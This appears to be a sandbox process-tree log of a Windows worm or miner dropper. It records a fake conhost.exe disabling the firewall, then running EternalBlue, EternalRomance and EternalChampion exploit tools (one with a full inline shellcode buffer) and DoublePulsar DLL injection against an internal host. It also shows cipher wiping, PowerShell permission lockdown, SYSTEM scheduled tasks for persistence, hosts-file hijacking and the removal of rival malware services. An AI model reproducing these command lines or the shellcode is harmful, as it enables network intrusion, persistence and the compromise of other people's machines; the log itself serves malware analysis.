-
C:\Windows\SysWOW64\cmd.execmd /c C:\windows\Installer\conhost.exe2⤵
- Loads dropped DLL
PID:2376 -
C:\windows\Installer\conhost.exeC:\windows\Installer\conhost.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:812 -
C:\Program Files\Windowsd\Fileftp.exe"C:\Program Files\Windowsd\Fileftp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2468 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable5⤵
- Modifies Windows Firewall
PID:992
-
-
C:\Program Files\Windowsd\Eternalblue-2.2.0.exe"C:\Program Files\Windowsd\Eternalblue-2.2.0.exe" --TargetIp 10.127.0.243 --Target WIN72K8R2 --logfile log.txt5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4588
-
-
C:\Program Files\Windowsd\Eternalromance-1.4.0.exe"C:\Program Files\Windowsd\Eternalromance-1.4.0.exe" --TargetIp 10.127.0.243 --Target XP_SP0SP1_X86 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --VerifyTarget True --ShellcodeFile shellcode.bin --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt --logfile log.txt5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:3604
-
-
C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe"C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe" Eternalchampion-2.0.0.exe --TargetIp 10.127.0.243 --Target XP_SP0SP1_X86 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --VerifyTarget True --ShellcodeBuffer 31C040900F8490060000E800000000586089C389E583EC60648B0D38000000668B4106C1E010668B01662500F08B086681F94D5A74072D00100000EBF08945FC5389C3B9940169E3E8C60100008945F8B9855483F0E8B90100008945F4B92E5B51D2E8AC0100008945ECB9B45CA05BE89F0100008945A45BB91401000029CC890C2454FF55A48B4C24048B54240881C41401000031C080F9067C0680FA027C01408945B88D55E831C9890A526A00526A0BFF55EC8B55E885D20F8450010000526A00FF55F885C00F844201000089C789C66A00FF75E8576A0BFF55EC85C00F852B01000081EFFC00000031C08945B48945B081C71C01000089F8E8C7010000B9FA3CADC239C8742FB91ABD4B2B39C87426B98B2D3D7639C87425B96BDD461F39C8741C8B55E881EA1C0100000F8CDD0000008955E8EBBB8B4FEC894DB4EB068B4FEC894DB0E86502000085C074A456FF55F48B75B489F05050682E6461746A61E88802000085C00F84A20000005883E940E8BB02000085C074158B16C1EA1889F0C1E81839D075078B464885C0740A83C60483E904E378EBD88975F05668F80F00006A00FF55F885C074645089C731C089C16681C10004F3AB5889008B55FC89500431D78B55F889500831D78B55F489500C31D78B55F089501031D78978248B4DB885C97411E89E0100008B55AC8950548B55A889505883C06089C78DB365040000B926020000F3A489C75B897B3889EC61C3535251575589E583EC1889CF89D88945FCE87F00000085C0746E8945F8E8F30000008945F48B45FC8B4DF8E81601000085C074548945F08B45FC8B4DF8E80C01000085C074428945EC8B45FC8B4DF8E80201000085C074308945E88B45FC89F98B55EC8B5DF4E8B000000083F8FF742189C18B45E8E8E40000006689C28B45FC8B4DF0E8DE00000083C4185D5F595A5BC331C0EBF35689C683C63C8B3601C666813E5045750983C6788B3601F05EC331C0EBFA56515789C631C089C7C1E70729C789F831C98A0E80F900740501C846EBE95F595EC356575289C631C089C7C1E70729C789F831D28A1601D046E2EE5A5F5EC356515789C631C089C7C1E70729C789F831C98A0E80F90074C601C84646EBE85F595EC383C0188B00C357565131FF89C639DF74198B04BA01F0E883FFFFFF39C8740747EBEB595E5FC389F8EBF8B8FFFFFFFFEBF183C11C8B0901C8C383C1208B0901C8C383C1248B0901C8C3D1E101C8668B00C381E2FFFF0000C1E20201D18B0901C8C350538B5DB0B9605AB582E87BFEFFFF8B500231C08A0284C075098955AC8945A84088025B58C331C08B4DB485C9740F8B4DB885C974078B4DB085C9740140C352568B74240C8B4C241031D2D1E985C9740CC1C205AC460C2030C249EBF089D05E5AC20800585A5F5E505689F083C63C8B3601C631C089C1668B4E06668B461401C683C61885C9741D8B0639F875078B460439D0740683C62849EBE98B460C8B4E085E01C6C331F6C36031C083F80F741E31C98B3C868B148E39D774034175F30FB694035604000039D1750D40EBDD4139C875056131C040C36131C0C3000102030405060708090A09090D0E8B4C240460E8000000005D6681E500F0894D34E8E5010000E84F010000E88B01000085C00F84E30000008B5D3C8B4BD8E8230100003C23740D3C77741C3CC87422E9B60000008B4D388B452489410E31C0884112E99F000000E81F010000E9B50000008B5D3C8B43E88B303375288B7808337D288B40043345283B431089C3757B8B4D3039F18B452C7418E8FE0000008D4604506A00FF550885C0746389452C89753001DF39F7775329DF01C75789F28B753C8B76F089D9F3A45E89D9C1E9028B5D28311E83C604E2F901D039C67C288B452C6089E650FFD089F461E8AD0000008B4524D1E831C988C101E98B0931C8894524E874000000B010EB08B020EB04B030EB008B4D38B4006601411E8B45108944241C61FF603C8B555485D274058B4D58880A8D45608B4D0C89885301000089A84A01000066B810008B4D386601411E8B45108944241C6168000000008B403C506800000000C331C088C8C1E90800C8C1E90800C8C1E90800C8C3518B452489C10FC9D1E031C889452859C360E80B0000008B45108B483C89483861C3608B5D2C85DB740D31C089DF8B4D30F3AA53FF550C31C089453089452C61C357525689CF8B55448B0AE83900000085C0750E83C2088B0AE82B00000085C07421894D446A0C588D71543B06740783C6043B06750D3B4604750889753C31C040EB0231C05E5A5FC331C039C17D0140C3525131D2668B510201CA3B11740583C104EBF75A8D411C83C00724F88945448B41F889453889D15AC35355575641544155415641574889E54881ECA80000006683E4F0E895040000488945F84889C3B92E5B51D2E8000300004885C00F84890200004889C6B9940169E3E8EA0200004885C00F8473020000488945F04889C7B9855483F0E8D00200004885C00F8459020000488945E8B9B45CA05BE8B90200004885C00F84420200004889458831C0488945A048894598B9140100004829CC890C244889E14883EC2CFF55884883C42C8B4C24048B5424084881C41401000031C080F9067C0780FA027C02FFC089857CFFFFFF4C8D4DD04D31C04C89C1448945D04C89C2B10BFFD6448B45D04585C00F84D60100008B55D04831C9FFD74885C00F84C50100004889C34831C94989C9448B45D04889C2B10BFFD64885C00F85A80100004889DF4881EFF80000004881C7280100008B55D081EA280100000F8C880100008955D04889F8E8F002000089C2B9FA3CADC239CA741DB91ABD4B2B39CA7414B98B2D3D7639CA7415B96BDD461F39CA740CEBB7488B77E8488975A0EB08488B77E848897598E88B01000085C0749C4889D9FF55E8488B45A04831D24889C38B503C4801D04889C64831C94889CA668B4806668B50144801D64883C61848BF2E646174610000004883F9000F84F8000000488B064839F874094883C62848FFC9EBE58B460C8B4E084801C648BBFEFEFEFEFEFEFEFE4883E9084883F9000F8CC6000000488B3E4839DF750C4C8B86980000004D85C074064883C608EBD84883C608488975E04831C9BAF00F0000FF55F04885C00F84900000004989C14831C0B9000400004C89CFF3AB4C89CF4881C788000000488D35130300004831C966B94702F3A44D8909488B5DF8498959084831DF488B5DF0498959104831DF488B5DE8498959184831DF488B5DE0498959204831DF418979448B8D7CFFFFFF85C97417E834000000488B5590498951708B558041899180000000488B45E04883C0704981C1880000004C89084889EC415F415E415D415C5E5F5D5BC353488B5D98B9605AB582E84F0000004885C0741E48634802488D54010731C08A0284C0750B48895590894580FFC088025BC331C048894590894580EBF331C0488B4DA04885C974158B8D7CFFFFFF85C97409488B4D984885C97402FFC0C3535251554889E54881EC00010000574889CF4889D848898500FFFFFFE8BB00000048898508FFFFFFE84801000048898510FFFFFF488B8500FFFFFF488B8D08FFFFFFE89A01000048898518FFFFFF488B8500FFFFFF488B8D08FFFFFFE88F01000048898520FFFFFF488B8500FFFFFF488B8D08FFFFFFE88401000048898528FFFFFF488B8500FFFFFF4889F9488B9520FFFFFF488B9D10FFFFFFE80F01000048898530FFFFFF488B8528FFFFFF488B8D30FFFFFFE8550100006689C2488B8500FFFFFF488B8D18FFFFFFE8490100005F4881C4000100005D595A5BC356574831F68B703C4801C666813E504575124881C6880000004831FF8B3E4801F85F5EC34831C0EBF85651574889C64831C089C7C1E70729C789F831C98A0E80F900740701C848FFC6EBE75F595EC35657524889C64831C089C7C1E70729C789F831D28A1601D048FFC6E2EC5A5F5EC35651574889C64831C089C7C1E70729C789F831C98A0E80F900740A01C848FFC648FFC6EBE45F595EC3564889C64883C6184831C08B065EC35365488B042538000000488B400448C1E80C48C1E00C488B186681FB4D5A7408482D00100000EBEE5BC35756514831FF4889C64831C08B04BA4801F0E840FFFFFF39C8740E48FFC74839DF740BEBE4595E5FC34889F8EBF74831C0EBF2564889C64831C08B411C4801F05EC3564889C64831C08B41204801F05EC3564889C64831C08B41244801F05EC348D1E14801C8668B00C34881CA0000FFFF4881F20000FFFF48C1E2024801D14831D28B114801D0C35756535541544155415641574989E44881EC080100004989CF488D2DE0FFFFFF6681E500F048894D584831D2668B51024801CA483B117406488D4908EBF5488D412848894534488B41F048894528E828010000E88C0100004885C00F84ED0000004C8B6D3C418B4DBCE8F90000003C23740D3C77741D3CC87423E9BD000000488B4D288B454489410EB001884112E9A5000000E8F4000000E99B0000004831DB4831F64831FF498B45D88B188B70048B78088B4D4831CB31CE31CF413B7510757B3B5D54488B454C7416E8E2000000488D53044831C9FF55104889454C895D544885C0745B4801F74839DF774F4829F74801C7574889F151498B75E8F3A45948C1E9025E8B554831164883C604E2F84801D84839C67C21FF554CE8920000008B4544D1E84831C988C14801E98B0931C8894544E843000000B010EB08B020EB04B030EB00488B4D28B4006601411E488B45204C89F94C89E4415F415E415D415C5D5B5E5FFF607831C088C8C1E90800C8C1E90800C8C1E90800C8C3518B454489C10FC9D1E031C889454859C351E81F000000488B4520488B487848894870488B4D704885C974088B8580000000880159C353574883EC28488B5D4C4885DB741331C04889DF4831C98B4D54F3AA4889D9FF55184831C08945544889454C4883C4285F5BC3515657488B7534488B0EE8480000004885C07511488D7608488B0EE8370000004885C0742B48894D346A0C58488DB1900000003B0674084883C6083B0675113B4604750C4889753C4831C048FFC0EB034831C05F5E59C34831C04839C17D0348FFC0C3 --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt --logfile log.txt5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:2396
-
-
C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe"C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe" --TargetIp 10.127.0.243 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6072
-
-
C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe"C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe" --TargetIp 10.127.0.243 --Protocol SMB --Architecture x86 --Function RunDLL --DllPayload x86.dll5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4872
-
-
C:\Windows\SysWOW64\cmd.execmd /c cipher /w:C5⤵PID:5584
-
C:\Windows\SysWOW64\cipher.execipher /w:C6⤵PID:1420
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\Windowsd\tem.vbs"5⤵PID:4868
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\inf\demo1.bat2⤵
- Drops file in Drivers directory
PID:2404 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3580
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:3592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5228
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:5292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5896
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:5904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5932
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:5940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5956
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:5972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:6012
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:6020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
PID:6036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:6060
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:6068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:6104
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:6112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:6132
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:6140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5232
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:5160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5912
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:5904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5916
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:5924
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:5976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:5988
-
-
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del3⤵PID:6028
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:6072
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:6100
-
-
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del3⤵PID:6128
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:2888
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:5228
-
-
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del3⤵PID:5908
-
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto3⤵PID:5932
-
-
C:\Windows\SysWOW64\sc.exesc start Schedule3⤵
- Launches sc.exe
PID:2212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn AutoKMSK /f3⤵PID:5920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Adobe Flash Player Updaters" /f3⤵PID:5948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 15 /tn "AutoKMSK" /tr "C:\windows\Installer\conhost.exe" /ru "system" /f3⤵
- Creates scheduled task(s)
PID:4732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /tn "AutoKMSK"3⤵PID:5464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 35 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f3⤵
- Creates scheduled task(s)
PID:5444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\Drivers\etc\hosts /a3⤵
- Modifies file permissions
PID:5424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5416
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\Drivers\etc\hosts /g users:f3⤵PID:5408
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts3⤵
- Views/modifies file attributes
PID:5388
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5340
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\Drivers\etc\hosts /d everyone3⤵PID:5332
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:5316
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\splwow64.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:5304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5288
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\splwow64.exe /d everyone3⤵PID:5280
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im splwow64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5268
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:5884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5876
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵PID:5868
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:5856
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\Mysql3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:5680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5708
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\Mysql /d everyone3⤵PID:5716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\Magnify.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5744
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Magnify.exe /d everyone3⤵PID:5752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sleep.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5800
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sleep.exe /d everyone3⤵PID:5808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "At1" /f3⤵PID:5824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "At2" /f3⤵PID:5236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "\Microsoft\Windows\UPnP\Services" /f3⤵PID:3800
-
-
C:\Windows\SysWOW64\sc.exesc stop EndpointRpc3⤵
- Launches sc.exe
PID:6116
-
-
C:\Windows\SysWOW64\sc.exesc delete EndpointRpc3⤵
- Launches sc.exe
PID:6096
-
-
C:\Windows\SysWOW64\sc.exesc stop HEU_KMS_Renewal3⤵PID:6132
-
-
C:\Windows\SysWOW64\sc.exesc delete HEU_KMS_Renewal3⤵
- Launches sc.exe
PID:5904
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsaus.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6080
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\system\lsaus.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:3820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3816
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system\lsaus.exe /d everyone3⤵PID:5848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsmos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5856
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\debug\lsmos.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:5720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5736
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\debug\lsmos.exe /d everyone3⤵PID:5732
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Temp\conhost.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5404
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\conhost.exe /d everyone3⤵PID:5412
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\SysWOW64\sc.exesc stop xWinWpdSrv3⤵
- Launches sc.exe
PID:5480
-
-
C:\Windows\SysWOW64\sc.exesc delete xWinWpdSrv3⤵PID:4752
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLService3⤵PID:4744
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLService3⤵
- Launches sc.exe
PID:4724
-
-
C:\Windows\SysWOW64\sc.exesc stop update3⤵PID:4968
-
-
C:\Windows\SysWOW64\sc.exesc delete update3⤵
- Launches sc.exe
PID:4956
-
-
C:\Windows\SysWOW64\sc.exesc stop Microsoft_Update3⤵PID:4940
-
-
C:\Windows\SysWOW64\sc.exesc delete Microsoft_Update3⤵
- Launches sc.exe
PID:4932
-
-
C:\Windows\SysWOW64\sc.exesc stop Samserver3⤵
- Launches sc.exe
PID:4916
-
-
C:\Windows\SysWOW64\sc.exesc delete Samserver3⤵PID:4904
-
-
C:\Windows\SysWOW64\sc.exesc stop RpcEptManger3⤵
- Launches sc.exe
PID:4892
-
-
C:\Windows\SysWOW64\sc.exesc delete RpcEptManger3⤵PID:4872
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftFonts3⤵
- Launches sc.exe
PID:4860
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftFonts3⤵PID:4844
-
-
C:\Windows\SysWOW64\sc.exesc stop WinVMDHCPI3⤵
- Launches sc.exe
PID:4832
-
-
C:\Windows\SysWOW64\sc.exesc delete WinVMDHCPI3⤵
- Launches sc.exe
PID:5152
-
-
C:\Windows\SysWOW64\sc.exesc stop wmiApServs3⤵
- Launches sc.exe
PID:5132
-
-
C:\Windows\SysWOW64\sc.exesc delete wmiApServs3⤵
- Launches sc.exe
PID:4232
-
-
C:\Windows\SysWOW64\sc.exesc stop "Windows TrustedInstaller"3⤵
- Launches sc.exe
PID:3580
-
-
C:\Windows\SysWOW64\sc.exesc delete "Windows TrustedInstaller"3⤵
- Launches sc.exe
PID:3872
-
-
C:\Windows\SysWOW64\sc.exesc stop COMSysCts3⤵PID:5492
-
-
C:\Windows\SysWOW64\sc.exesc delete COMSysCts3⤵
- Launches sc.exe
PID:5488
-
-
C:\Windows\SysWOW64\sc.exesc stop SuperProServer3⤵PID:616
-
-
C:\Windows\SysWOW64\sc.exesc delete SuperProServer3⤵
- Launches sc.exe
PID:5472
-
-
C:\Windows\SysWOW64\sc.exesc stop WindosroServert3⤵PID:4756
-
-
C:\Windows\SysWOW64\sc.exesc delete WindosroServert3⤵PID:4740
-
-
C:\Windows\SysWOW64\sc.exesc stop wmiApSrvs3⤵
- Launches sc.exe
PID:4720
-
-
C:\Windows\SysWOW64\sc.exesc delete wmiApSrvs3⤵PID:4960
-
-
C:\Windows\SysWOW64\sc.exesc stop Abrjkb Dumne3⤵
- Launches sc.exe
PID:4944
-
-
C:\Windows\SysWOW64\sc.exesc delete Abrjkb Dumne3⤵PID:4936
-
-
C:\Windows\SysWOW64\sc.exesc stop Defghiback3⤵
- Launches sc.exe
PID:4924
-
-
C:\Windows\SysWOW64\sc.exesc delete Defghiback3⤵PID:5772
-
-
C:\Windows\SysWOW64\sc.exesc stop RpcEpt3⤵PID:5744
-
-
C:\Windows\SysWOW64\sc.exesc delete RpcEpt3⤵
- Launches sc.exe
PID:5708
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql3⤵
- Launches sc.exe
PID:3808
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql3⤵
- Launches sc.exe
PID:3820
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMssql3⤵PID:4924
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMssql3⤵
- Launches sc.exe
PID:5356
-
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSrv3⤵
- Launches sc.exe
PID:5372
-
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv3⤵
- Launches sc.exe
PID:5340
-
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSvr3⤵PID:5600
-
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSvr3⤵PID:5612
-
-
C:\Windows\SysWOW64\sc.exesc stop Framework3⤵
- Launches sc.exe
PID:5624
-
-
C:\Windows\SysWOW64\sc.exesc delete Framework3⤵PID:5640
-
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_643⤵PID:3852
-
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_643⤵PID:3868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3892
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\tasksche.exe" /d everyone3⤵PID:3896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3908
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiAppSrv\svchost.exe" /d everyone3⤵PID:3916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3936
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiAppSvr\svchost.exe" /d everyone3⤵PID:3944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3960
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiApprsv\svchost.exe" /d everyone3⤵PID:4764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4780
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiAppSrv\csrss.exe" /d everyone3⤵PID:4784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4800
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe" /d everyone3⤵PID:4812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4824
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\WmiAppSvr\csrss.exe" /d everyone3⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4364
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\WmiApprsv\csrss.exe" /d everyone3⤵PID:4376
-
-
